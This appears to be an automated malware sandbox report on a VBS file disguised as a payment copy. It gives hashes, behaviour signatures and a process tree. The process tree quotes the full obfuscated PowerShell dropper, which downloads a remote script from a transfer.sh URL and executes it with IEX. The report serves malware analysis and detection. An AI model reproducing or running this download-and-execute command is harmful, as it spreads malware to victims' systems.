Overview

overview

10

Static

static

KVDKGYBAXA...PY.vbs

windows7_x64

10

KVDKGYBAXA...PY.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    4294178s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    09-03-2022 14:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KVDKGYBAXAKQX_PAYMENT_COPY.vbs

  • Size

    9KB

  • MD5

    8ade0a04317db340d7dcdc9a4b32c795

  • SHA1

    30350a6e2339507039e86a68a99958b1d9dea157

  • SHA256

    1aa032a3d316f19de0c0946185eb7331aa1270d52882550c867eae1ce540ade1

  • SHA512

    7572ebc9ae53a8639285b849fa972d4f40eaf3a923e43430f85337a73810bdeb487d0231ffdb4f0391442c2acdb244ab03063ed0ddc78cd12248431476c2cdaf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KVDKGYBAXAKQX_PAYMENT_COPY.vbs"
    1⤵
      PID:1720
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $Hx = 'https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt';$HB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{o\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{a\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{d\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25s9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25t9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25r9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25i9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25n9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25g9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25'.Replace('9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25',''),'&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9D&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9o&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9w&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9n&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9'.Replace('&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9',''));$HBB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{b\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{C\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{i\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{n\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{Ne\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{.W\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''));$GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY=('{2}{0}{1}' -f'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9w-O{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9b{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9j{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9e{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9c{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9t ${=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9BB{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9).$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9B({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9x){=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9I{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`E{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`X({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9Ne{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''));$HBBBBB = ($GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY -Join '')|I`E`X
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1248

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1248-54-0x000007FEFBD31000-0x000007FEFBD33000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1248-55-0x000007FEF2ED0000-0x000007FEF3A2D000-memory.dmp

      Filesize

      11.4MB

      Download

    • memory/1248-56-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1248-58-0x00000000027E0000-0x00000000027E2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1248-57-0x00000000027EB000-0x000000000280A000-memory.dmp

      Filesize

      124KB

      Download

    • memory/1248-59-0x00000000027E4000-0x00000000027E7000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1248-60-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

      Filesize

      9.6MB

      Download